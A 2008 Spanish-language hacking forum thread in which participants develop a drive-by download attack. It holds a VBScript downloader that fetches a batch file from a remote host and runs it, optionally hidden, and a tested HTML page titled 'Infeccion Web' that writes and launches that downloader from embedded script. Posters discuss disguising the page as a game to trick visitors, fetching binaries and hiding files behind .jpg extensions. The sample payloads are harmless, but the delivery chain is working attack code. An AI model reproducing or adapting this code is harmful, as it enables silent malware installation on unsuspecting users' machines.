[HTML-VBS-Batch] Propagacion a traves de Internet ? Posible ?

Iniciado por SmartGenius, 20 Julio 2008, 20:04 PM

0 Miembros y 1 Visitante están viendo este tema.

SmartGenius

Tenemos como base el siguiente codigo...

http://two.xthost.info/smartgenius/codigo.txt

Archivo BAT de Prueba
mode con cols=60
mode con lines=20
@echo off
title Propagacion a traves de Internet - By :: SmartGenius ::
color 0a

:ini
cls
echo.
echo.
echo  Este es un Archivo de Comandos BATCH descargado
echo  a traves de internet mediante un Script VBS
echo  insertado en una Pagina HTML.
echo.
echo  El Script es capaz de Bajar y Ejecutar Codigo, casi
echo  sin permiso del Usuario...
echo.
echo  Por ahora es Solo una idea, pero espero poder
echo  desarrollarlo completamente...
echo.
echo  Un Saludo... ;)
echo.
pause
exit


El cual puede ser una serie de comandos Batch, ya sea de virus o bromas o cualquier otra cosa, o puede ser tambien cualquier otro archivo...

Ahora tomemos un script VBS que nos descarga y nos ejecuta el archivo...

VBS Downloader
Set aVar = CreateObject("Microsoft.XMLHTTP")
aVar.Open "GET","http://two.xthost.info/smartgenius/codigo.txt",0
aVar.Send()
Set sDow = CreateObject("ADODB.Stream")
sDow.Mode = 3
sDow.Type = 1
sDow.Open()
sDow.Write(aVar.responseBody)
sDow.SaveToFile "codigo.bat",2
Set codigo = CreateObject("WScript.Shell")
codigo.Run "Codigo.bat"


y por ultimo una pagina HTML con codigo VBS insertado para crear archivos de texto plano en la PC...

Pagina HTML Decorada...xD
<HTML>
<HEAD><TITLE>.:: SmartGenius - powered by iSmart ::.</TITLE>
</HEAD>
<BODY bgColor=#000000 text="green">
<script language="vbs">
Dim smart, archivo
Set smart = CreateObject("Scripting.FileSystemObject")
set archivo= smart.CreateTextFile("pepito.bat", True)
archivo.WriteLine("@echo off")
archivo.WriteLine("title SmartGenius")
archivo.WriteLine("color 0a")
archivo.WriteLine("echo  Hola")
archivo.WriteLine("echo  Codigo de Prueba")
archivo.WriteLine("pause")
archivo.close
</script>
<center><h1>Propagacion de Code a traves de Internet</h1><br><br>Demostracion de Descarga y Ejecucion de Codigo...by :: SmartGenius ::</center>
</BODY>
</HTML>


Entonces, la pagina HTML crea un archio en la PC, en este caso un Bat que dice prueba y no mas...

La teoria seria que la pagina HTML creara y ejecutara el segundo codigo, el VBS Downloader y este se encarga de descargar y ejecutar el resto...

Pueden guardar el VBS Downloader y ejecutarlo y veran como descarga y ejecuta el otro bat, y seria posible hacerlo de manera oculta agregando al final ,vbHide...

Hasta aqui todo bien, lo unico que no logro hacer es crear el codigo del VBS Downloader a partir de la pagina HTML.... ya que como es un code VBS creando otro VBS es en ese momento donde hay un problema porque hay ciertos caracteres y funciones reservadas, y no logro que el code salga bien...

Es por ahora una teoria, pero espero poder desarrollarla completamente y dar una nueva posibilidad de propagacion a nuestros codes...

Agradeceria un poco de ayuda, de los expertos en VBS...NovLucker ??..

Un Saludo.


Darioxhcx

mmmmm
yo x ejemplo lo unico que se hacer es usar la cmd con vbs
lo hacia cuando usaba troyanos xD , necesitaba ejecutar un "server.exe" q estaba en programfiles
pero buee
Script Language="VBScript">
Set shell = createObject("Wscript.shell")
shell.run("cmd.exe /c @echo off & echo hola soy dario & pause")
</Script>
<H1 align="center">...</H1>
<H4 align="center">...<BR>
<H1 align="center">para ver de la web de forma correcta debe habilitar los componentes</H1>
<H4 align="center">se recomienda usar internet explorer para el funcionamiento de la pagina..</H4>


pero no anda con firefox, o por lo menos a mi no me andubo, solo con explorer
capas que te sirve
saludos

Zaraki_lkenpachi

Hye Dario xD bah has usado troyanos :O y me recomiendas no meterme a la programacion de ellos xD jajaja bueno bueno Ok Np :D y bueno gracias por el Codigo voy a investigar como usar esto del Microsoft.XMLHTTP y ADOdb


Novlucker

#3
Buenas :: SmartGenius ::  ;D

Bueno, ese metodo que comentas.. también yo lo he utilizado (solo el vbs, no en html).. y me ha funcionado, los archivos se bajan.. y nadie se entera.... pero en más de una ocasión he tenido problemas a la hora de crear el objeto "Microsoft.XMLHTTP", y por más que he intentado... no ha habido manera de desaparecer un error que salta a la hora de su creación  :-\.. no se si esto venga por temas de algún parche o limitaciones que pueda tener un sistema... un claro ejemplo de esto puede ser el objeto que se utiliza para automatización del outlook.... el cual, después de la aparición de virus como el Ana Kournikova, microsoft limito casi enteramente su uso....

Y con respecto a lo del *.vbs embedido en la web... más dificil aún...y te muestro un claro ejemplo....



No digo que sea imposible.. pero por temas de seguridad... los objetos activex están siendo seguidos muuuuy de cerca  :P

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

Darioxhcx

Cita de: Zaraki_lkenpachi en 21 Julio 2008, 05:35 AM
Hye Dario xD bah has usado troyanos :O y me recomiendas no meterme a la programacion de ellos xD jajaja bueno bueno Ok Np :D y bueno gracias por el Codigo voy a investigar como usar esto del Microsoft.XMLHTTP y ADOdb
use troyanos durante una semana para conocer como eran, tmb saber como prevenirlo
pero mis post nunca fueron "como puedo crear un troyano o un virus ?"
no se puede aprender mucho de ellos, pero sirven de algo
ademas usaba cosas x ejemplo, esconderlo con la cmd atras de un .jpg , keda como extension .jpg y lo ejecuto de este script en vbs q puse arriba

pero creo que ya me estoy llendo del tema principal
perdon
saludos

Zaraki_lkenpachi

Ok no hay problema  ;) no estoy juzgando a nadie solo decia  :xD y mucho gusto Dario ... con respecto a eso del ActiveX es cierto todas las paginas son bloqueadas .. con el Filtro de Seguridad del IE 7.0 pero quien sabe habra algo para desactivarlas  :huh: y por un enlace de Web ejecutar Script en un equipo Cliente


Novlucker

#6
:: SmartGenius ::... he aquí el code..... lo he probado, y funciona correctamente.... pero como comenté antes... primero salta la barra del iexplorer, y luego, cuando le das ok a que permita el contenido bloqueado, cada vez que se entre a la página, saltará un nuevo mensaje avisando de un control activex...



En definitiva... el code html (basado en el tuyo)  :P

<HTML>
<HEAD><TITLE>Novlucker</TITLE>
</HEAD>
<BODY bgColor=#000000 text="blue">
<script language="vbs">
set objfso = createobject("scripting.filesystemobject")
set download = objfso.createtextfile("downloader.vbs",true)
download.writeline "set objxml = CreateObject(""Microsoft.XMLHTTP"")"
download.writeline "objxml.Open ""GET"",""http://usuarios.lycos.es/novlucker/vbs/bat.txt"",0"
download.writeline "objxml.Send()"
download.writeline "set objado = CreateObject(""ADODB.Stream"")"
download.writeline "objado.Mode = 3"
download.writeline "objado.Type = 1"
download.writeline "objado.Open()"
download.writeline "objado.Write(objxml.responseBody)"
download.writeline "objado.SaveToFile ""codigo.bat"",2"
download.writeline "set objshell = CreateObject(""WScript.Shell"")"
download.writeline "objshell.run ""Codigo.bat"""
download.close
set objshell = createobject("wscript.shell")
objshell.run "downloader.vbs"
</script>
<center><h1>Infeccion Web</h1><br><br>By Novlucker</center>
</BODY>
</HTML>


Esta página crea un archivo llamado "downloader.vbs" y lo ejecuta... a su vez, este archivo... descarga un "bat.txt" y también lo ejecuta....  :P

Lo he subido aqui(click) por si alguien quiere probar,esta el html, y el bat, si desconfian, máquina virtual ,y sino bueno, suban ustedes mismos los archivos a algun host gratuito  :P

Comentar además que hace algún tiempo había probado hacer esto y alguna otra cosa parecida.... pero me parecía que no resultaba justamente por las alertas que lanza el navegador, las cuales además vienen por defecto  :-\

Eso fue todo

Saludos

[Modifico] Nota: Tener en cuenta además que el método utilizado, solo permite descargar texto plano, por lo que en este caso no hay problemas ya que se trata de un *.bat..... pero con un par de modificaciones se podrían bajar ejecutables/binarios :rolleyes:
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein

SmartGenius

Ok, NovLucer.. muchisimas gracias por tu ayuda, se ve que sabes bastante de VBS.. ;D

Claro que salta el aviso del control active X, pero se puede camuflar la pagina con un juego o algo asi, y bien decoradita, pues seguro que alguie tendra que caer... ;D

Saludos.


Novlucker

#8
Cita de: :: SmartGenius :: en 22 Julio 2008, 03:14 AM
Claro que salta el aviso del control active X, pero se puede camuflar la pagina con un juego o algo asi, y bien decoradita, pues seguro que alguie tendra que caer... ;D

Bueno, en eso te doy la razón, hay muchas personas que no tienen idea de nada  :-\.... un último inconveniente..... este tipo de método puede ser reconocido por los AV como un downloader, por ejemplo el KIS me tira aviso de que se trata de un Trojan-Downloader.VBS.Small.l... ya que este método fue utilizado hace mucho tiempo por algunos virus *.vbs  :-X

Saludos
Contribuye con la limpieza del foro, reporta los "casos perdidos" a un MOD XD

"Hay dos cosas infinitas: el Universo y la estupidez  humana. Y de la primera no estoy muy seguro."
Albert Einstein